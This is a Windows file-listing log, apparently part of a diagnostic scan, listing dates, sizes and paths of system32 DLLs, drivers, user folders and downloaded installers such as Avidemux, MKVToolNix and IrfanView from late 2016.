2016-10-04 01:16 - 2016-10-04 01:16 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactActivation.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00046784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapstoasttask.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00036704 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00036168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00023776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00021344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL
2016-10-04 01:16 - 2016-10-04 01:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL
2016-10-04 01:16 - 2016-10-04 01:16 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosTrace.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosHost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccessRes.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneutilRes.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneServiceRes.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll
2016-10-04 01:15 - 2016-10-04 01:16 - 00734208 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 13867520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 02423296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAJApi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00601200 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00589144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00583648 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00576512 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00570720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2016-10-04 01:15 - 2016-10-04 01:15 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00458592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00293888 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00265728 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00261984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00254976 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\system32\container.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-10-04 01:15 - 2016-10-04 01:15 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbvideo.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00175968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00145248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinRtTracing.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00132608 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00111968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00101216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00095072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2016-10-04 01:07 - 2016-07-16 05:45 - 03331584 _____ (Microsoft Corporation) C:\WINDOWS\system32\NlsLexicons0018.dll
2016-10-04 01:07 - 2016-07-16 05:42 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\NlsData0018.dll
2016-10-04 01:07 - 2016-07-16 05:39 - 01868800 _____ (Microsoft Corporation) C:\WINDOWS\system32\MLS2.dll
2016-10-04 01:05 - 2016-10-04 01:05 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\WINDOWS\system32\msmq
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\Program Files\MSBuild
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\inetpub
2016-10-04 01:00 - 2016-05-25 22:03 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2016-10-04 01:00 - 2016-05-25 22:03 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-10-04 01:00 - 2016-05-25 22:03 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2016-10-04 00:59 - 2016-10-04 00:59 - 00173408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys
2016-10-03 16:05 - 2016-10-03 16:05 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-10-03 15:29 - 2016-10-03 15:29 - 00000000 ____D C:\ProgramData\USOShared
2016-10-03 15:28 - 2016-10-03 16:07 - 00000000 ____D C:\Users\admin\AppData\Local\ConnectedDevicesPlatform
2016-10-03 15:27 - 2016-10-03 15:27 - 00000020 ___SH C:\Users\admin\ntuser.ini
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default\My Documents
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-10-03 15:17 - 2016-10-03 15:24 - 00015243 _____ C:\WINDOWS\diagwrn.xml
2016-10-03 15:17 - 2016-10-03 15:24 - 00015243 _____ C:\WINDOWS\diagerr.xml
2016-10-03 15:09 - 2016-10-13 11:42 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-10-03 14:50 - 2016-10-03 14:50 - 00001487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-10-03 14:50 - 2016-10-03 14:50 - 00000000 ____D C:\Users\Default\AppData\Roaming\Media Center Programs
2016-10-03 14:50 - 2016-10-03 14:50 - 00000000 ____D C:\Users\Default\AppData\Local\Google
2016-10-03 14:50 - 2016-10-03 14:50 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Media Center Programs
2016-10-03 14:50 - 2016-10-03 14:50 - 00000000 ____D C:\Users\Default User\AppData\Local\Google
2016-10-03 14:46 - 2016-10-03 14:51 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2016-10-03 14:46 - 2016-10-03 14:46 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines
2016-10-03 14:41 - 2016-10-06 16:07 - 00000000 ____D C:\Users\admin
2016-10-03 14:41 - 2016-10-03 14:58 - 00000000 ____D C:\Users\DefaultAppPool
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\user\My Documents
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\user\Documents\My Videos
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\user\Documents\My Pictures
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\user\Documents\My Music
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\DefaultAppPool\My Documents
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Videos
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Pictures
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Music
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\admin\My Documents
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\admin\Documents\My Videos
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\admin\Documents\My Pictures
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\admin\Documents\My Music
2016-10-03 14:40 - 2016-10-13 11:47 - 01181114 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-10-03 14:35 - 2016-10-03 14:46 - 00000000 ____D C:\Program Files\Realtek
2016-10-03 14:35 - 2016-10-03 14:35 - 00000000 ____D C:\WINDOWS\system32\sda
2016-10-03 14:35 - 2016-10-03 14:35 - 00000000 ____D C:\WINDOWS\system32\RTCOM
2016-10-03 14:31 - 2016-10-13 10:51 - 00286768 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-10-03 14:31 - 2016-10-12 13:59 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-10-03 14:31 - 2016-10-03 14:31 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2016-10-03 11:55 - 2016-10-03 11:56 - 05111808 _____ (Thomas Tsai) C:\Users\admin\Downloads\tuxboot-0.8.2.exe
2016-09-30 15:42 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avidemux (32 bits)
2016-09-30 15:42 - 2016-09-30 15:52 - 00000000 ____D C:\Users\admin\AppData\Roaming\avidemux
2016-09-30 15:42 - 2016-09-30 15:42 - 00001142 _____ C:\Users\Public\Desktop\Avidemux 2.6 - 32 bits (32-bit).lnk
2016-09-30 15:40 - 2016-09-30 15:42 - 00000000 ____D C:\Program Files\Avidemux 2.6 - 32 bits
2016-09-30 15:39 - 2016-09-30 15:40 - 24982849 _____ C:\Users\admin\Downloads\avidemux_2.6.14_win32.exe
2016-09-30 15:37 - 2016-09-30 15:37 - 00000000 ____D C:\Users\admin\AppData\Roaming\iDealshare VideoGo 6
2016-09-30 15:36 - 2016-09-30 15:36 - 18103025 _____ (iDealshare Corporation ) C:\Users\admin\Downloads\i-video-converter.exe
2016-09-30 15:08 - 2016-09-30 15:08 - 00000000 ____D C:\Users\admin\AppData\Local\bunkus.org
2016-09-30 15:06 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MKVToolNix
2016-09-30 15:06 - 2016-09-30 15:06 - 00001966 _____ C:\Users\Public\Desktop\MKVToolNix GUI.lnk
2016-09-30 15:06 - 2016-09-30 15:06 - 00000000 ____D C:\Program Files\MKVToolNix
2016-09-30 15:05 - 2016-09-30 15:06 - 14148696 _____ (Moritz Bunkus) C:\Users\admin\Downloads\mkvtoolnix-32bit-9.4.2-setup.exe
2016-09-30 14:43 - 2016-09-30 14:44 - 10550447 _____ (Aone Software ) C:\Users\admin\Downloads\uvjoiner.exe
2016-09-30 13:51 - 2016-09-30 13:51 - 00000000 ____D C:\Users\admin\Downloads\msvcr100
2016-09-30 13:32 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MP4Tools
2016-09-30 13:32 - 2016-09-30 13:32 - 00001149 _____ C:\Users\admin\Desktop\MP4Splitter.lnk
2016-09-30 13:32 - 2016-09-30 13:32 - 00001139 _____ C:\Users\admin\Desktop\MP4Joiner.lnk
2016-09-30 13:32 - 2016-09-30 13:32 - 00000000 ____D C:\Program Files\MP4Tools
2016-09-30 12:52 - 2016-09-30 12:53 - 18565891 _____ (Thüring IT-Consulting ) C:\Users\admin\Downloads\MP4Tools-3.4-win32.exe
2016-09-30 12:48 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Video Joiner
2016-09-30 12:48 - 2016-09-30 12:48 - 00001068 _____ C:\Users\Public\Desktop\Free Video Joiner.lnk
2016-09-30 12:48 - 2016-09-30 12:48 - 00000000 ____D C:\Program Files\Free Video Joiner
2016-09-30 12:47 - 2016-09-30 12:48 - 06324201 _____ (FreeVideoJoiner.com ) C:\Users\admin\Downloads\freevideojoinersetup.exe
2016-09-30 10:36 - 2016-09-30 15:56 - 00000000 ____D C:\Users\admin\Desktop\Peter Russell - The Global Brain (1983)
2016-09-30 10:01 - 2016-09-30 10:12 - 08935424 _____ C:\Users\admin\Desktop\EURUSD-M1.xls
2016-09-30 09:38 - 2016-09-30 09:47 - 02309498 _____ C:\Users\admin\Desktop\EURUSD,M1.csv
2016-09-30 09:18 - 2016-09-30 09:18 - 00032841 _____ C:\Users\admin\Downloads\Output History.ex4
2016-09-29 12:08 - 2016-09-29 12:08 - 26323424 _____ (Irfan Skiljan) C:\Users\admin\Downloads\irfanview_plugins_x64_442_setup.exe
2016-09-29 12:08 - 2016-09-29 12:08 - 16396256 _____ (Irfan Skiljan) C:\Users\admin\Downloads\irfanview_plugins_442_setup.exe
2016-09-29 12:08 - 2016-09-29 12:08 - 03367392 _____ (Irfan Skiljan) C:\Users\admin\Downloads\iview442_x64_setup.exe
2016-09-29 12:08 - 2016-09-29 12:08 - 02131936 _____ (Irfan Skiljan) C:\Users\admin\Downloads\iview442_setup.exe
2016-09-29 11:32 - 2016-09-29 11:32 - 00449672 _____ C:\Users\admin\Downloads\PROCEDURA SSM.pdf
